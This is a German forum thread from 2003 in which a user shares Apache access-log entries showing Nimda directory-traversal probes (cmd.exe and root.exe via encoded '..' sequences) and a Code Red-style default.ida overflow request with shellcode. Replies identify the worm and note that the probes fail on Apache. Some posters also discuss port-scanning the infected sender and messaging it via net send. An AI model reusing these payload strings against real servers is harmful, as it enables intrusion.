• 19.04.2024, 05:33
  • Registrieren
  • Anmelden

  • Sie sind nicht angemeldet.

 

Doh! (Oder: Apache, was soll das?)

Lieber Besucher, herzlich willkommen bei: Aqua Computer Forum. Falls dies Ihr erster Besuch auf dieser Seite ist, lesen Sie sich bitte die Hilfe durch. Dort wird Ihnen die Bedienung dieser Seite näher erläutert. Darüber hinaus sollten Sie sich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutzen Sie das Registrierungsformular, um sich zu registrieren oder informieren Sie sich ausführlich über den Registrierungsvorgang. Falls Sie sich bereits zu einem früheren Zeitpunkt registriert haben, können Sie sich hier anmelden.

Daywalker313

Senior Member

Beiträge: 812

Doh! (Oder: Apache, was soll das?)

Samstag, 12. April 2003, 17:22

Ich hab mir grad ma die Access.log von meinem Apache angeguckt und bin dabei auf folgendes gestoßen:

Zitat

80.142.180.167 - - [11/Apr/2003:22:49:28 +0200] "GET http://www.yahoo.com/ HTTP/1.1" 200 58
217.64.100.90 - - [11/Apr/2003:23:19:19 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
217.64.100.90 - - [11/Apr/2003:23:19:22 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
217.64.100.90 - - [11/Apr/2003:23:19:27 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
217.64.100.90 - - [11/Apr/2003:23:19:30 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
217.64.100.90 - - [11/Apr/2003:23:19:32 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
217.64.100.90 - - [11/Apr/2003:23:19:36 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
217.64.100.90 - - [11/Apr/2003:23:19:39 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
217.64.100.90 - - [11/Apr/2003:23:19:42 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
217.64.100.90 - - [11/Apr/2003:23:19:46 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.64.100.90 - - [11/Apr/2003:23:19:49 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.64.100.90 - - [11/Apr/2003:23:19:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.64.100.90 - - [11/Apr/2003:23:19:54 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.64.100.90 - - [11/Apr/2003:23:20:02 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
217.64.100.90 - - [11/Apr/2003:23:20:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
217.64.100.90 - - [11/Apr/2003:23:20:15 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
217.64.100.90 - - [11/Apr/2003:23:20:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
217.220.112.3 - - [11/Apr/2003:23:26:24 +0200] "GET


Ist das normal?
Ich denk ja eigentlich net dass irgendein Apache Zugriff was in meinem Windoof Ordner zu suchen hat >:(!

DAP

God

Beiträge: 3 281

Re: Doh! (Oder: Apache, was soll das?)

Samstag, 12. April 2003, 17:46

das sind ganz normale web-zugriffe über die jemand versucht zugriff auf deinen win-ordner zu bekommen, wenn du den apache hast kann dir das aber egal sein, der gibt da nur error 404 zurück.. ;)

edit: falsch formuliert, der versucht net direkt zugriff zu bekommen sondern befehle auf deinem rechner auszuführen... funktioniert aber nur beim microsoft iis und einigen billig-webservern, aber net beim apache ;)

Mburg

Full Member

Beiträge: 246

Re: Doh! (Oder: Apache, was soll das?)

Samstag, 12. April 2003, 18:06

Zitat von »Jonathan«

Ich hab mir grad ma die Access.log von meinem Apache angeguckt und bin dabei auf folgendes gestoßen:

Ist das normal?
Ich denk ja eigentlich net dass irgendein Apache Zugriff was in meinem Windoof Ordner zu suchen hat  >:(!



IMHO ist das ein mit dem NIMDA Virus infizierter IIS Server,
der jetzt versucht Dein sys zu infizieren. Mich wundert das
es noch Systeme gibt, die gegen diesen Virus noch nicht
geschützt sind.

MfG
Mburg
AMD 5600x ; Inno3D GTX1080 8GB ;MSI X570 Gaming Plus

Daywalker313

Senior Member

Beiträge: 812

Re: Doh! (Oder: Apache, was soll das?)

Samstag, 12. April 2003, 18:11

Hehe, ich hab den ma angepingt, der hat ja net ma DSL (1000ms durchschnitt).
Der heißt Cyber15, nur leider brauch ich Username+PW um auf ihn zugreifen zu können :(.

Und jetzt die DAU Frage 8):
"Wie hack isch den denn??"


Hab auch noch mehr von den fiesen Angriffen (immer 404 :P):

Zitat

217.227.243.211 - - [12/Apr/2003:14:32:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 283

Mburg

Full Member

Beiträge: 246

Re: Doh! (Oder: Apache, was soll das?)

Samstag, 12. April 2003, 18:25

Zitat von »Jonathan«

Hehe, ich hab den ma angepingt, der hat ja net ma DSL (1000ms durchschnitt).
Der heißt Cyber15, nur leider brauch ich Username+PW um auf ihn zugreifen zu können  :(.

Und jetzt die DAU Frage  8):
"Wie hack isch den denn??"


Hab auch noch mehr von den fiesen Angriffen (immer 404 :P):


Portscan mit nmap und kucken ob NetBEUI/BIOS ports offen
sind (139). Dann mit net send 'message' ne Nachricht auf
cyber15 schicken. Sag dem ärmsten das er Nimda infiziert ist
und das er Deine Logs vollmüllt. Hacken ist Verboten. ;)
Nen plötzlich auftauchendes PopUp aus dem Nirwana ist
Schreck genug.

MfG
Mburg

AMD 5600x ; Inno3D GTX1080 8GB ;MSI X570 Gaming Plus

Daywalker313

Senior Member

Beiträge: 812

Re: Doh! (Oder: Apache, was soll das?)

Samstag, 12. April 2003, 19:48

hmm, obwohl port 139 offen ist, gehts irgendwie net ::).
Ich hab nur bis 500 gescannt .. was kann man denn mit 445 und 135 so anstellen? ;D

Mburg

Full Member

Beiträge: 246

Re: Doh! (Oder: Apache, was soll das?)

Samstag, 12. April 2003, 21:02

Zitat von »Jonathan«

hmm, obwohl port 139 offen ist, gehts irgendwie net  ::).
Ich hab nur bis 500 gescannt .. was kann man denn mit 445 und 135 so anstellen?  ;D


Ich hab grad folgendes gesendet:

net send 217.64.100.90 Your Sys is infected with the NIMDA virus

"Die Nachricht wurde Erfolgreich an 217.64.100.90 versendet"
war die Rückmeldung. Das war NetBIOS/BEUI über Port 139.
Das bedeutet das die Kiste (laut whois irgentwo in Mali ;D )
jetzt ein PopUp Fenster mit der Nachricht auf hat.


MfG
Mburg
AMD 5600x ; Inno3D GTX1080 8GB ;MSI X570 Gaming Plus

Daywalker313

Senior Member

Beiträge: 812

Re: Doh! (Oder: Apache, was soll das?)

Samstag, 12. April 2003, 21:08

lol, thx.
Ich habs nochmal probiert, war aber nix *hammer nimm und SMC kaputt hau*